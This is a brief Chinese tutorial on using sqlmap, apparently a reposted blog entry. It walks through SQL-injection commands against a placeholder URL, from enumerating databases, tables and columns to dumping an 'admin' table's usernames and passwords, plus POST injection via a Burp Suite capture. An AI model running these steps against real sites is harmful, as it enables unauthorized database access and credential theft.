使用SQLMAP扫描步骤


sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

一、检测注入点是否可以利用

    C:\Python27\sqlmap>python sqlmap.py -u "http://xxxxxx/products.asp?id=56" 

参数:
-u:指定注入点url,注意带入注入点

如果成功,那么会显示数据库版本注入类型等信息

二、爆出数据库数据

python sqlmap.py -u "http://xxxxxx/products.asp?id=56" --user

这表命令可以爆出数据库当前用户

python sqlmap.py -u "http://xxxxxx/products.asp?id=56"--current-db

这条命令可以爆出当前数据库名

--current :意思当前正在使用的

下面进行逐步爆破

1.列出所有数据库

python sqlmap.py -u "http://xxxxxx/products.asp?id=56"--dbs

--db:所有数据库

2.列出指定数据库所有表

python sqlmap.py -u "http://xxxxxx/products.asp?id=56"-D currdb --tables

-D:指定数据库

--tables:列出数据库中所有表

3.列出指定数据库表里面的字段

python sqlmap.py -u "http://xxxxxx/products.asp?id=56"-D currdb -T admin --columns

-T:指定要列出字段的表

--columns:指定列出字段

4.爆出字段内容

python sqlmap.py -u "http://xxxxxx/products.asp?id=56"-D currdb -T admin -C "Username,userpassword"  --dump 

-C:指定字段

--dump:打印

以上是对GET注入类型的步骤

如果是POST类型注入的话

可以使用用burpsuite进行抓包,保存数据包

使用命令sqlmap.py -r "c:\Users\fendo\Desktop\xxx.txt" --dbs


你可能感兴趣的:(使用SQLMAP扫描步骤)